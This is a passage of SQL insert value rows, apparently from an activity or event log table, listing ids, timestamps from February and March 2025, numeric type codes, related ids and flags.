(15870, '2025-02-17 16:08:30', 1, 2060, 0, 1, 1),
(15871, '2025-02-17 18:07:03', 1, 2054, 0, 1, 1),
(15872, '2025-02-17 18:28:32', 1, 2064, 0, 1, 1),
(15873, '2025-02-17 18:52:34', 1, 2054, 0, 1, 1),
(15874, '2025-02-17 19:20:49', 1, 2054, 0, 1, 1),
(15875, '2025-02-17 20:37:43', 1, 2055, 0, 1, 1),
(15876, '2025-02-18 01:50:35', 1, 2059, 0, 1, 1),
(15877, '2025-02-18 02:03:07', 1, 2062, 0, 1, 1),
(15878, '2025-02-18 02:50:30', 1, 2061, 0, 1, 1),
(15879, '2025-02-18 04:07:39', 1, 2054, 0, 1, 1),
(15880, '2025-02-18 10:11:27', 1, 2063, 0, 1, 1),
(15881, '2025-02-18 12:55:47', 1, 2059, 0, 1, 1),
(15882, '2025-02-18 14:26:08', 1, 2062, 0, 1, 1),
(15883, '2025-02-18 16:07:43', 1, 2054, 0, 1, 1),
(15884, '2025-02-19 01:49:41', 1, 2062, 0, 1, 1),
(15885, '2025-02-19 05:05:42', 1, 2053, 0, 1, 1),
(15886, '2025-02-19 13:12:47', 1, 2059, 0, 1, 1),
(15887, '2025-02-19 14:19:49', 1, 2062, 0, 1, 1),
(15888, '2025-02-19 15:11:08', 1, 2061, 0, 1, 1),
(15889, '2025-02-19 15:11:37', 1, 2062, 0, 1, 1),
(15890, '2025-02-19 15:11:50', 1, 2060, 0, 1, 1),
(15891, '2025-02-19 17:36:07', 1, 2064, 0, 1, 1),
(15892, '2025-02-19 17:36:35', 1, 2064, 0, 1, 1),
(15893, '2025-02-19 19:09:43', 1, 2059, 0, 1, 1),
(15894, '2025-02-19 19:09:43', 1, 2058, 0, 1, 1),
(15895, '2025-02-19 19:09:43', 1, 2061, 0, 1, 1),
(15896, '2025-02-19 19:09:44', 1, 2054, 0, 1, 1),
(15897, '2025-02-19 19:09:48', 1, 2053, 0, 1, 1),
(15898, '2025-02-19 19:10:14', 1, 2055, 0, 1, 1),
(15899, '2025-02-19 19:10:18', 1, 2055, 0, 1, 1),
(15900, '2025-02-19 19:10:47', 1, 2054, 0, 1, 1),
(15901, '2025-02-19 19:10:48', 1, 2063, 0, 1, 1),
(15902, '2025-02-19 19:10:58', 1, 2062, 0, 1, 1),
(15903, '2025-02-19 19:11:00', 1, 2059, 0, 1, 1),
(15904, '2025-02-19 19:11:05', 1, 2058, 0, 1, 1),
(15905, '2025-02-19 21:21:07', 1, 2054, 0, 1, 1),
(15906, '2025-02-20 01:45:32', 1, 2063, 0, 1, 1),
(15907, '2025-02-20 01:45:47', 1, 2062, 0, 1, 1),
(15908, '2025-02-20 01:46:03', 1, 2060, 0, 1, 1),
(15909, '2025-02-20 01:46:16', 1, 2059, 0, 1, 1),
(15910, '2025-02-20 02:34:21', 1, 2061, 0, 1, 1),
(15911, '2025-02-20 02:39:46', 1, 2053, 0, 1, 1),
(15912, '2025-02-20 03:13:10', 1, 2063, 0, 1, 1),
(15913, '2025-02-20 03:13:23', 1, 2060, 0, 1, 1),
(15914, '2025-02-20 03:31:02', 1, 2055, 0, 1, 1),
(15915, '2025-02-20 06:24:28', 1, 2059, 0, 1, 1),
(15916, '2025-02-20 06:35:08', 1, 2054, 0, 1, 1),
(15917, '2025-02-20 14:56:20', 1, 2062, 0, 1, 1),
(15918, '2025-02-20 17:02:26', 1, 2055, 0, 1, 1),
(15919, '2025-02-20 19:32:52', 1, 2053, 0, 1, 1),
(15920, '2025-02-20 20:35:34', 1, 2053, 0, 1, 1),
(15921, '2025-02-21 05:02:10', 1, 2054, 0, 1, 1),
(15922, '2025-02-21 06:20:13', 1, 2064, 0, 1, 1),
(15923, '2025-02-21 10:04:13', 1, 2054, 0, 1, 1),
(15924, '2025-02-21 14:28:29', 1, 2062, 0, 1, 1),
(15925, '2025-02-21 15:59:14', 1, 2061, 0, 1, 1),
(15926, '2025-02-21 19:47:27', 1, 2062, 0, 1, 1),
(15927, '2025-02-21 19:47:30', 1, 2062, 0, 1, 1),
(15928, '2025-02-21 21:23:01', 1, 2054, 0, 1, 1),
(15929, '2025-02-22 01:15:53', 1, 2061, 0, 1, 1),
(15930, '2025-02-22 01:40:52', 1, 2054, 0, 1, 1),
(15931, '2025-02-22 05:11:20', 1, 2053, 0, 1, 1),
(15932, '2025-02-22 07:08:27', 1, 2061, 0, 1, 1),
(15933, '2025-02-22 10:04:01', 1, 2060, 0, 1, 1),
(15934, '2025-02-22 10:41:20', 1, 2061, 0, 1, 1),
(15935, '2025-02-22 14:04:26', 1, 2058, 0, 1, 1),
(15936, '2025-02-22 14:17:35', 1, 2062, 0, 1, 1),
(15937, '2025-02-22 15:55:48', 1, 2064, 0, 1, 1),
(15938, '2025-02-22 21:35:46', 1, 2061, 0, 1, 1),
(15939, '2025-02-23 04:23:10', 4, 2061, 2954, 1, 1),
(15940, '2025-02-23 15:01:30', 1, 2062, 0, 1, 1),
(15941, '2025-02-23 21:21:59', 1, 2054, 0, 1, 1),
(15942, '2025-02-23 21:41:11', 1, 2054, 0, 1, 1),
(15943, '2025-02-23 21:41:30', 1, 2058, 0, 1, 1),
(15944, '2025-02-23 21:41:49', 1, 2060, 0, 1, 1),
(15945, '2025-02-23 21:42:16', 1, 2055, 0, 1, 1),
(15946, '2025-02-23 21:42:24', 1, 2062, 0, 1, 1),
(15947, '2025-02-23 21:42:32', 1, 2061, 0, 1, 1),
(15948, '2025-02-23 21:42:51', 1, 2063, 0, 1, 1),
(15949, '2025-02-23 21:42:59', 1, 2059, 0, 1, 1),
(15950, '2025-02-23 21:45:17', 1, 2064, 0, 1, 1),
(15951, '2025-02-24 05:02:54', 1, 2059, 0, 1, 1),
(15952, '2025-02-24 06:32:54', 1, 2059, 0, 1, 1),
(15953, '2025-02-24 07:54:09', 1, 2063, 0, 1, 1),
(15954, '2025-02-24 14:22:59', 1, 2062, 0, 1, 1),
(15955, '2025-02-25 07:09:08', 1, 2064, 0, 1, 1),
(15956, '2025-02-25 11:55:16', 1, 2054, 0, 1, 1),
(15957, '2025-02-25 11:55:25', 1, 2054, 2957, 1, 1),
(15958, '2025-02-25 12:22:44', 1, 2053, 0, 1, 1),
(15959, '2025-02-25 12:33:25', 1, 2062, 0, 1, 1),
(15960, '2025-02-25 12:45:44', 1, 2063, 0, 1, 1),
(15961, '2025-02-25 12:51:14', 1, 2064, 0, 1, 1),
(15962, '2025-02-25 13:07:51', 1, 2055, 0, 1, 1),
(15963, '2025-02-25 13:33:59', 1, 2062, 0, 1, 1),
(15964, '2025-02-25 13:46:51', 1, 2058, 0, 1, 1),
(15965, '2025-02-25 13:59:25', 1, 2062, 0, 1, 1),
(15966, '2025-02-25 14:12:12', 1, 2059, 0, 1, 1),
(15967, '2025-02-25 14:20:18', 1, 2060, 0, 1, 1),
(15968, '2025-02-25 14:23:33', 1, 2055, 0, 1, 1),
(15969, '2025-02-25 14:23:57', 1, 2064, 0, 1, 1),
(15970, '2025-02-25 14:32:45', 1, 2062, 0, 1, 1),
(15971, '2025-02-25 14:32:46', 1, 2059, 0, 1, 1),
(15972, '2025-02-25 14:50:50', 1, 2053, 0, 1, 1),
(15973, '2025-02-25 15:10:15', 1, 2063, 0, 1, 1),
(15974, '2025-02-25 15:14:24', 1, 2061, 0, 1, 1),
(15975, '2025-02-25 15:33:09', 1, 2060, 0, 1, 1),
(15976, '2025-02-25 15:46:18', 1, 2063, 0, 1, 1),
(15977, '2025-02-25 15:48:20', 1, 2054, 0, 1, 1),
(15978, '2025-02-25 16:57:33', 1, 2061, 0, 1, 1),
(15979, '2025-02-25 18:27:22', 1, 2058, 0, 1, 1),
(15980, '2025-02-25 19:53:26', 1, 2061, 0, 1, 1),
(15981, '2025-02-25 21:43:59', 1, 2054, 0, 1, 1),
(15982, '2025-02-25 22:11:16', 1, 2058, 0, 1, 1),
(15983, '2025-02-25 22:11:18', 1, 2059, 0, 1, 1),
(15984, '2025-02-25 23:47:33', 1, 2059, 0, 1, 1),
(15985, '2025-02-25 23:54:41', 1, 2062, 0, 1, 1),
(15986, '2025-02-25 23:54:45', 1, 2061, 0, 1, 1),
(15987, '2025-02-25 23:54:49', 1, 2063, 0, 1, 1),
(15988, '2025-02-26 00:12:18', 1, 2064, 0, 1, 1),
(15989, '2025-02-26 00:42:29', 1, 2062, 0, 1, 1),
(15990, '2025-02-26 01:06:23', 1, 2063, 0, 1, 1),
(15991, '2025-02-26 01:07:49', 1, 2061, 0, 1, 1),
(15992, '2025-02-26 01:18:25', 1, 2059, 0, 1, 1),
(15993, '2025-02-26 01:20:37', 1, 2058, 0, 1, 1),
(15994, '2025-02-26 01:32:45', 1, 2055, 0, 1, 1),
(15995, '2025-02-26 01:33:33', 1, 2054, 0, 1, 1),
(15996, '2025-02-26 02:15:11', 1, 2060, 0, 1, 1),
(15997, '2025-02-26 12:01:15', 1, 2063, 0, 1, 1),
(15998, '2025-02-26 12:33:04', 1, 2054, 0, 1, 1),
(15999, '2025-02-26 13:14:28', 1, 2064, 0, 1, 1),
(16000, '2025-02-26 14:42:06', 1, 2062, 0, 1, 1),
(16001, '2025-02-27 14:32:28', 1, 2062, 0, 1, 1),
(16002, '2025-02-27 20:34:58', 1, 2063, 0, 1, 1),
(16003, '2025-02-27 23:53:49', 1, 2054, 0, 1, 1),
(16004, '2025-02-28 04:27:15', 1, 2053, 0, 1, 1),
(16005, '2025-02-28 04:29:06', 1, 2059, 0, 1, 1),
(16006, '2025-02-28 04:44:31', 1, 2054, 0, 1, 1),
(16007, '2025-02-28 04:54:50', 1, 2061, 0, 1, 1),
(16008, '2025-02-28 05:32:06', 1, 2063, 0, 1, 1),
(16009, '2025-02-28 05:37:30', 1, 2054, 0, 1, 1),
(16010, '2025-02-28 05:39:14', 1, 2062, 0, 1, 1),
(16011, '2025-02-28 05:40:49', 1, 2058, 0, 1, 1),
(16012, '2025-02-28 06:28:18', 1, 2055, 0, 1, 1),
(16013, '2025-02-28 06:30:44', 1, 2060, 0, 1, 1),
(16014, '2025-02-28 07:58:14', 1, 2054, 0, 1, 1),
(16015, '2025-02-28 10:26:34', 1, 2064, 0, 1, 1),
(16016, '2025-02-28 10:45:34', 1, 2053, 0, 1, 1),
(16017, '2025-02-28 10:59:04', 1, 2061, 0, 1, 1),
(16018, '2025-02-28 11:14:17', 1, 2058, 0, 1, 1),
(16019, '2025-02-28 14:44:27', 1, 2062, 0, 1, 1),
(16020, '2025-03-01 02:00:45', 1, 2059, 0, 1, 1),
(16021, '2025-03-01 03:33:17', 1, 2064, 0, 1, 1),
(16022, '2025-03-01 03:43:18', 1, 2064, 0, 1, 1),
(16023, '2025-03-01 11:40:30', 1, 2059, 0, 1, 1),
(16024, '2025-03-01 12:26:04', 1, 2058, 0, 1, 1),
(16025, '2025-03-01 12:43:36', 1, 2063, 0, 1, 1),
(16026, '2025-03-01 13:03:59', 1, 2060, 0, 1, 1),
(16027, '2025-03-01 14:07:54', 1, 2062, 0, 1, 1),
(16028, '2025-03-01 14:20:57', 1, 2062, 0, 1, 1),
(16029, '2025-03-01 23:44:38', 1, 2060, 0, 1, 1),
(16030, '2025-03-02 02:58:42', 1, 2061, 0, 1, 1),
(16031, '2025-03-02 03:41:59', 1, 2058, 0, 1, 1),
(16032, '2025-03-02 05:23:07', 1, 2064, 0, 1, 1),
(16033, '2025-03-02 06:24:17', 1, 2054, 0, 1, 1),
(16034, '2025-03-02 13:03:59', 1, 2060, 0, 1, 1),
(16035, '2025-03-02 14:08:05', 1, 2062, 0, 1, 1),
(16036, '2025-03-02 15:02:26', 1, 2064, 0, 1, 1),
(16037, '2025-03-02 15:11:18', 1, 2062, 0, 1, 1),
(16038, '2025-03-02 15:32:15', 1, 2061, 0, 1, 1),
(16039, '2025-03-02 17:24:33', 1, 2059, 0, 1, 1),
(16040, '2025-03-03 00:51:45', 1, 2060, 0, 1, 1),
(16041, '2025-03-03 03:01:53', 4, 2061, 2996, 1, 1),
(16042, '2025-03-03 04:34:42', 1, 2053, 0, 1, 1),
(16043, '2025-03-03 05:38:45', 1, 2064, 0, 1, 1),
(16044, '2025-03-03 06:12:42', 1, 2060, 0, 1, 1),
(16045, '2025-03-03 10:03:29', 1, 2055, 0, 1, 1),
(16046, '2025-03-03 11:28:59', 1, 2064, 0, 1, 1),
(16047, '2025-03-03 11:38:51', 1, 2058, 0, 1, 1),
(16048, '2025-03-03 14:59:43', 1, 2062, 0, 1, 1),
(16049, '2025-03-03 16:45:02', 1, 2060, 0, 1, 1),
(16050, '2025-03-03 18:49:45', 1, 2054, 0, 1, 1),
(16051, '2025-03-03 19:31:12', 1, 2054, 0, 1, 1),
(16052, '2025-03-03 22:29:32', 1, 2063, 0, 1, 1),
(16053, '2025-03-04 11:11:07', 1, 2063, 0, 1, 1),
(16054, '2025-03-04 13:26:12', 1, 2054, 0, 1, 1),
(16055, '2025-03-04 15:08:59', 1, 2062, 0, 1, 1),
(16056, '2025-03-04 16:35:46', 1, 2062, 0, 1, 1),
(16057, '2025-03-04 17:47:18', 1, 2062, 0, 1, 1),
(16058, '2025-03-04 21:38:28', 1, 2060, 0, 1, 1),
(16059, '2025-03-04 21:38:33', 1, 2055, 0, 1, 1),
(16060, '2025-03-04 21:38:39', 1, 2059, 0, 1, 1),
(16061, '2025-03-04 21:38:42', 1, 2058, 0, 1, 1),
(16062, '2025-03-04 21:38:46', 1, 2054, 0, 1, 1),
(16063, '2025-03-04 21:38:49', 1, 2064, 0, 1, 1),
(16064, '2025-03-04 21:38:55', 1, 2063, 0, 1, 1),
(16065, '2025-03-04 21:38:58', 1, 2062, 0, 1, 1),
(16066, '2025-03-04 21:39:02', 1, 2061, 0, 1, 1),
(16067, '2025-03-04 22:32:06', 1, 2062, 0, 1, 1),
(16068, '2025-03-04 22:37:56', 1, 2060, 0, 1, 1),
(16069, '2025-03-04 22:40:46', 1, 2055, 0, 1, 1),
(16070, '2025-03-04 23:48:47', 1, 2058, 0, 1, 1),
(16071, '2025-03-05 14:27:40', 1, 2054, 0, 1, 1),
(16072, '2025-03-05 14:27:50', 1, 2054, 0, 1, 1),
(16073, '2025-03-05 14:27:58', 4, 2054, 2999, 1, 1),
(16074, '2025-03-05 14:54:19', 1, 2062, 0, 1, 1),
(16075, '2025-03-05 16:50:15', 1, 2060, 0, 1, 1),
(16076, '2025-03-05 19:33:01', 1, 2061, 0, 1, 1),
(16077, '2025-03-05 23:40:05', 1, 2061, 0, 1, 1),
(16078, '2025-03-06 00:15:51', 1, 2053, 0, 1, 1),
(16079, '2025-03-06 01:47:10', 1, 2061, 0, 1, 1),
(16080, '2025-03-06 03:53:28', 1, 2053, 0, 1, 1),
(16081, '2025-03-06 06:08:30', 1, 2059, 0, 1, 1),
(16082, '2025-03-06 06:10:54', 1, 2055, 0, 1, 1),
(16083, '2025-03-06 06:36:05', 1, 2054, 0, 1, 1),
(16084, '2025-03-06 08:41:50', 1, 2063, 0, 1, 1),
(16085, '2025-03-06 10:25:36', 1, 2063, 0, 1, 1),
(16086, '2025-03-06 14:20:00', 1, 2062, 0, 1, 1),
(16087, '2025-03-06 14:44:12', 1, 2054, 0, 1, 1),
(16088, '2025-03-06 18:30:26', 1, 2062, 0, 1, 1),
(16089, '2025-03-06 19:23:43', 1, 2058, 0, 1, 1),
(16090, '2025-03-06 23:35:45', 1, 2062, 0, 1, 1),
(16091, '2025-03-06 23:59:22', 1, 2059, 0, 1, 1),
(16092, '2025-03-07 02:20:17', 1, 2054, 0, 1, 1),
(16093, '2025-03-07 03:19:32', 1, 2058, 0, 1, 1),
(16094, '2025-03-07 04:05:53', 1, 2053, 0, 1, 1),
(16095, '2025-03-07 14:21:07', 1, 2061, 0, 1, 1),
(16096, '2025-03-07 14:22:37', 1, 2055, 0, 1, 1),
(16097, '2025-03-07 14:25:21', 1, 2058, 0, 1, 1),
(16098, '2025-03-07 14:47:37', 1, 2064, 0, 1, 1),
(16099, '2025-03-07 15:21:38', 1, 2059, 0, 1, 1),
(16100, '2025-03-07 15:30:09', 1, 2062, 0, 1, 1),
(16101, '2025-03-07 16:49:53', 1, 2058, 0, 1, 1),
(16102, '2025-03-07 17:11:58', 1, 2060, 0, 1, 1),
(16103, '2025-03-07 17:17:13', 1, 2062, 0, 1, 1),
(16104, '2025-03-07 17:35:18', 1, 2063, 0, 1, 1),
(16105, '2025-03-07 19:30:10', 1, 2055, 0, 1, 1),
(16106, '2025-03-07 20:26:27', 1, 2061, 0, 1, 1),
(16107, '2025-03-07 22:57:17', 1, 2064, 0, 1, 1),
(16108, '2025-03-08 02:51:15', 1, 2064, 0, 1, 1),
(16109, '2025-03-08 03:00:29', 1, 2064, 0, 1, 1),
(16110, '2025-03-08 03:18:13', 1, 2060, 0, 1, 1),
(16111, '2025-03-08 04:11:49', 1, 2062, 0, 1, 1),
(16112, '2025-03-08 05:55:04', 1, 2061, 0, 1, 1),
(16113, '2025-03-08 06:05:20', 1, 2059, 0, 1, 1),
(16114, '2025-03-08 08:09:26', 1, 2053, 0, 1, 1),
(16115, '2025-03-08 11:10:29', 4, 2061, 3014, 1, 1),
(16116, '2025-03-08 11:10:30', 4, 2055, 3014, 1, 1),
(16117, '2025-03-08 11:10:31', 4, 2064, 3014, 1, 1),
(16118, '2025-03-08 11:10:32', 4, 2058, 3014, 1, 1),
(16119, '2025-03-08 11:11:09', 4, 2060, 3014, 1, 1),
(16120, '2025-03-08 11:11:10', 4, 2063, 3014, 1, 1),
(16121, '2025-03-08 11:11:12', 4, 2062, 3014, 1, 1),
(16122, '2025-03-08 11:17:41', 1, 2064, 3014, 1, 1),
(16123, '2025-03-08 11:18:46', 1, 2064, 3014, 1, 1),
(16124, '2025-03-08 11:18:59', 1, 2064, 3014, 1, 1),
(16125, '2025-03-08 12:39:46', 1, 2064, 3014, 1, 1),
(16126, '2025-03-08 12:39:56', 1, 2064, 3014, 1, 1),
(16127, '2025-03-08 14:32:17', 1, 2058, 0, 1, 1),
(16128, '2025-03-08 14:32:26', 1, 2061, 0, 1, 1),
(16129, '2025-03-08 14:36:05', 1, 2059, 0, 1, 1),
(16130, '2025-03-08 14:46:13', 1, 2054, 0, 1, 1),
(16131, '2025-03-08 15:06:56', 1, 2055, 0, 1, 1),
(16132, '2025-03-08 15:06:56', 1, 2064, 0, 1, 1),
(16133, '2025-03-08 15:09:50', 1, 2060, 0, 1, 1),
(16134, '2025-03-08 15:09:52', 1, 2062, 0, 1, 1),
(16135, '2025-03-08 15:14:10', 1, 2063, 0, 1, 1),
(16136, '2025-03-08 15:34:52', 1, 2062, 0, 1, 1),
(16137, '2025-03-08 15:37:56', 1, 2061, 0, 1, 1),
(16138, '2025-03-08 15:38:01', 1, 2058, 0, 1, 1),
(16139, '2025-03-08 15:40:17', 1, 2059, 0, 1, 1),
(16140, '2025-03-08 15:41:46', 1, 2062, 0, 1, 1),
(16141, '2025-03-08 15:41:51', 1, 2060, 0, 1, 1),
(16142, '2025-03-08 15:42:37', 1, 2063, 0, 1, 1),
(16143, '2025-03-08 15:42:39', 1, 2064, 0, 1, 1),
(16144, '2025-03-08 15:55:03', 1, 2055, 0, 1, 1),
(16145, '2025-03-08 15:55:04', 1, 2054, 0, 1, 1),
(16146, '2025-03-08 15:55:29', 1, 2053, 0, 1, 1),
(16147, '2025-03-08 21:03:48', 1, 2061, 0, 1, 1),
(16148, '2025-03-09 02:06:00', 1, 2058, 0, 1, 1),
(16149, '2025-03-09 06:42:46', 1, 2063, 0, 1, 1),
(16150, '2025-03-09 10:47:02', 1, 2059, 0, 1, 1),
(16151, '2025-03-09 13:00:52', 1, 2055, 0, 1, 1),
(16152, '2025-03-09 14:25:29', 1, 2062, 0, 1, 1),
(16153, '2025-03-09 15:52:11', 1, 2064, 0, 1, 1),
(16154, '2025-03-09 15:52:17', 4, 2064, 3015, 1, 1),
(16155, '2025-03-09 15:52:40', 1, 2064, 0, 1, 1),
(16156, '2025-03-09 15:52:42', 4, 2064, 3016, 1, 1),
(16157, '2025-03-09 15:52:58', 1, 2064, 0, 1, 1),
(16158, '2025-03-09 15:53:01', 4, 2064, 3017, 1, 1),
(16159, '2025-03-09 15:53:15', 1, 2064, 0, 1, 1),
(16160, '2025-03-09 15:53:18', 4, 2064, 3018, 1, 1),
(16161, '2025-03-09 15:53:32', 1, 2064, 0, 1, 1),
(16162, '2025-03-09 15:53:37', 4, 2064, 3019, 1, 1),
(16163, '2025-03-09 15:53:50', 1, 2064, 0, 1, 1),
(16164, '2025-03-09 15:53:54', 4, 2064, 3020, 1, 1),
(16165, '2025-03-09 18:51:02', 1, 2060, 0, 1, 1),
(16166, '2025-03-09 19:41:01', 1, 2061, 0, 1, 1),
(16167, '2025-03-09 23:40:24', 1, 2054, 0, 1, 1),
(16168, '2025-03-09 23:48:14', 1, 2055, 0, 1, 1),
(16169, '2025-03-10 02:50:36', 1, 2059, 0, 1, 1),
(16170, '2025-03-10 03:03:24', 1, 2054, 0, 1, 1),
(16171, '2025-03-10 03:07:22', 1, 2061, 0, 1, 1),
(16172, '2025-03-10 04:28:18', 1, 2064, 0, 1, 1),
(16173, '2025-03-10 04:33:57', 1, 2055, 0, 1, 1),
(16174, '2025-03-10 04:51:18', 1, 2059, 0, 1, 1),
(16175, '2025-03-10 05:07:13', 1, 2059, 0, 1, 1),
(16176, '2025-03-10 05:07:20', 1, 2061, 0, 1, 1),
(16177, '2025-03-10 05:07:26', 1, 2058, 0, 1, 1),
(16178, '2025-03-10 05:15:35', 1, 2053, 0, 1, 1),
(16179, '2025-03-10 05:56:21', 1, 2054, 0, 1, 1),
(16180, '2025-03-10 14:19:15', 1, 2061, 0, 1, 1),
(16181, '2025-03-10 15:32:32', 1, 2063, 0, 1, 1),
(16182, '2025-03-10 15:57:33', 1, 2062, 0, 1, 1),
(16183, '2025-03-10 17:44:23', 1, 2062, 0, 1, 1),
(16184, '2025-03-10 19:14:01', 1, 2053, 0, 1, 1),
(16185, '2025-03-10 19:40:38', 1, 2053, 0, 1, 1),
(16186, '2025-03-10 20:01:01', 1, 2054, 0, 1, 1),
(16187, '2025-03-11 00:56:49', 1, 2054, 0, 1, 1),
(16188, '2025-03-11 03:33:21', 1, 2055, 0, 1, 1),
(16189, '2025-03-11 14:18:26', 1, 2062, 0, 1, 1),
(16190, '2025-03-11 14:23:30', 1, 2062, 0, 1, 1),
(16191, '2025-03-11 17:18:28', 1, 2058, 0, 1, 1),
(16192, '2025-03-11 20:27:03', 1, 2058, 0, 1, 1),
(16193, '2025-03-12 07:17:45', 1, 2055, 0, 1, 1),
(16194, '2025-03-12 07:17:51', 1, 2064, 0, 1, 1),
(16195, '2025-03-12 07:17:55', 1, 2061, 0, 1, 1),
(16196, '2025-03-12 07:17:59', 1, 2058, 0, 1, 1),
(16197, '2025-03-12 11:31:27', 1, 2064, 0, 1, 1),
(16198, '2025-03-12 13:08:53', 1, 2062, 0, 1, 1),
(16199, '2025-03-12 14:31:28', 1, 2062, 0, 1, 1),
(16200, '2025-03-12 15:36:35', 1, 2059, 0, 1, 1),
(16201, '2025-03-12 18:56:45', 1, 2053, 0, 1, 1),
(16202, '2025-03-13 00:49:53', 1, 2059, 0, 1, 1),
(16203, '2025-03-13 04:30:18', 1, 2055, 0, 1, 1),
(16204, '2025-03-13 04:30:18', 1, 2064, 0, 1, 1),
(16205, '2025-03-13 04:30:18', 1, 2058, 0, 1, 1),
(16206, '2025-03-13 04:30:18', 1, 2064, 0, 1, 1),
(16207, '2025-03-13 04:30:19', 1, 2064, 0, 1, 1),
(16208, '2025-03-13 04:30:19', 1, 2053, 0, 1, 1),
(16209, '2025-03-13 04:30:39', 1, 2061, 0, 1, 1),
(16210, '2025-03-13 04:30:56', 1, 2060, 0, 1, 1),
(16211, '2025-03-13 04:30:56', 1, 2059, 0, 1, 1),
(16212, '2025-03-13 04:30:58', 1, 2053, 0, 1, 1),
(16213, '2025-03-13 04:30:59', 1, 2062, 0, 1, 1),
(16214, '2025-03-13 04:31:00', 1, 2063, 0, 1, 1),
(16215, '2025-03-13 04:31:01', 1, 2054, 0, 1, 1),
(16216, '2025-03-13 07:18:54', 1, 2053, 0, 1, 1),
(16217, '2025-03-13 10:50:57', 1, 2064, 0, 1, 1),
(16218, '2025-03-13 10:50:58', 1, 2058, 0, 1, 1),
(16219, '2025-03-13 10:50:59', 1, 2064, 0, 1, 1),
(16220, '2025-03-13 10:51:00', 1, 2053, 0, 1, 1),
(16221, '2025-03-13 10:51:01', 1, 2064, 0, 1, 1),
(16222, '2025-03-13 10:51:03', 1, 2055, 0, 1, 1),
(16223, '2025-03-13 10:51:16', 1, 2061, 0, 1, 1),
(16224, '2025-03-13 10:51:35', 1, 2062, 0, 1, 1),
(16225, '2025-03-13 10:51:36', 1, 2053, 0, 1, 1),
(16226, '2025-03-13 10:51:37', 1, 2063, 0, 1, 1),
(16227, '2025-03-13 10:51:38', 1, 2060, 0, 1, 1),
(16228, '2025-03-13 10:51:39', 1, 2054, 0, 1, 1),
(16229, '2025-03-13 10:51:40', 1, 2059, 0, 1, 1),
(16230, '2025-03-13 14:41:06', 1, 2062, 0, 1, 1),
(16231, '2025-03-13 19:00:21', 1, 2055, 0, 1, 1),
(16232, '2025-03-13 21:31:11', 1, 2059, 0, 1, 1),
(16233, '2025-03-14 12:02:28', 1, 2054, 0, 1, 1),
(16234, '2025-03-14 12:02:32', 1, 2063, 0, 1, 1),
(16235, '2025-03-14 12:02:34', 1, 2059, 0, 1, 1),
(16236, '2025-03-14 12:02:35', 1, 2062, 0, 1, 1),
(16237, '2025-03-14 12:02:37', 1, 2061, 0, 1, 1),
(16238, '2025-03-14 12:02:38', 1, 2058, 0, 1, 1),
(16239, '2025-03-14 12:02:38', 1, 2060, 0, 1, 1),
(16240, '2025-03-14 12:02:39', 1, 2064, 0, 1, 1),
(16241, '2025-03-14 12:02:41', 1, 2055, 0, 1, 1),
(16242, '2025-03-14 14:59:08', 1, 2062, 0, 1, 1),
(16243, '2025-03-14 15:41:32', 1, 2061, 0, 1, 1),
(16244, '2025-03-14 15:55:06', 1, 2058, 0, 1, 1),
(16245, '2025-03-14 18:06:14', 1, 2054, 0, 1, 1),
(16246, '2025-03-14 18:23:23', 1, 2053, 0, 1, 1),
(16247, '2025-03-14 18:30:56', 1, 2060, 0, 1, 1),
(16248, '2025-03-14 18:57:15', 1, 2064, 0, 1, 1),
(16249, '2025-03-14 20:02:34', 1, 2060, 0, 1, 1),
(16250, '2025-03-14 20:02:39', 1, 2059, 0, 1, 1),
(16251, '2025-03-14 20:02:47', 1, 2058, 0, 1, 1),
(16252, '2025-03-14 20:47:35', 1, 2055, 0, 1, 1),
(16253, '2025-03-15 01:08:15', 1, 2055, 0, 1, 1),
(16254, '2025-03-15 03:09:33', 1, 2064, 0, 1, 1),
(16255, '2025-03-15 05:09:11', 1, 2059, 0, 1, 1),
(16256, '2025-03-15 05:09:12', 1, 2064, 0, 1, 1),
(16257, '2025-03-15 05:09:12', 1, 2064, 0, 1, 1),
(16258, '2025-03-15 05:09:12', 1, 2058, 0, 1, 1),
(16259, '2025-03-15 05:09:12', 1, 2061, 0, 1, 1),
(16260, '2025-03-15 05:09:12', 1, 2064, 0, 1, 1),
(16261, '2025-03-15 05:09:30', 1, 2063, 0, 1, 1),
(16262, '2025-03-15 05:09:33', 1, 2062, 0, 1, 1),
(16263, '2025-03-15 05:09:51', 1, 2054, 0, 1, 1),
(16264, '2025-03-15 05:09:54', 1, 2053, 0, 1, 1),
(16265, '2025-03-15 05:09:55', 1, 2060, 0, 1, 1),
(16266, '2025-03-15 05:09:56', 1, 2055, 0, 1, 1),
(16267, '2025-03-15 08:01:50', 1, 2055, 0, 1, 1),
(16268, '2025-03-15 08:01:55', 1, 2064, 0, 1, 1),
(16269, '2025-03-15 08:01:58', 1, 2061, 0, 1, 1),
(16270, '2025-03-15 08:02:01', 1, 2058, 0, 1, 1),
(16271, '2025-03-15 11:41:17', 1, 2064, 0, 1, 1),
(16272, '2025-03-15 11:52:46', 1, 2060, 0, 1, 1),
(16273, '2025-03-15 13:59:23', 1, 2061, 0, 1, 1),
(16274, '2025-03-15 14:20:00', 1, 2062, 0, 1, 1),
(16275, '2025-03-15 16:30:46', 1, 2059, 0, 1, 1),
(16276, '2025-03-15 16:59:57', 1, 2063, 0, 1, 1),
(16277, '2025-03-16 02:25:33', 1, 2062, 0, 1, 1),
(16278, '2025-03-16 03:21:15', 1, 2054, 0, 1, 1),
(16279, '2025-03-16 06:16:54', 1, 2061, 0, 1, 1),
(16280, '2025-03-16 08:41:34', 1, 2064, 0, 1, 1),
(16281, '2025-03-16 09:30:46', 1, 2061, 0, 1, 1),
(16282, '2025-03-16 11:07:02', 1, 2058, 0, 1, 1),
(16283, '2025-03-16 14:52:07', 1, 2062, 0, 1, 1),
(16284, '2025-03-16 18:52:00', 1, 2060, 0, 1, 1),
(16285, '2025-03-16 21:32:38', 1, 2062, 0, 1, 1),
(16286, '2025-03-16 23:11:47', 1, 2063, 0, 1, 1),
(16287, '2025-03-16 23:50:54', 1, 2064, 0, 1, 1),
(16288, '2025-03-17 02:09:54', 1, 2063, 0, 1, 1),
(16289, '2025-03-17 08:05:57', 1, 2053, 0, 1, 1),
(16290, '2025-03-17 08:22:14', 1, 2054, 0, 1, 1),
(16291, '2025-03-17 13:01:15', 1, 2064, 0, 1, 1),
(16292, '2025-03-17 14:18:32', 1, 2062, 0, 1, 1),
(16293, '2025-03-17 17:26:07', 1, 2064, 0, 1, 1),
(16294, '2025-03-17 23:54:36', 1, 2060, 0, 1, 1),
(16295, '2025-03-18 08:23:20', 1, 2061, 0, 1, 1),
(16296, '2025-03-18 12:09:59', 1, 2062, 0, 1, 1),
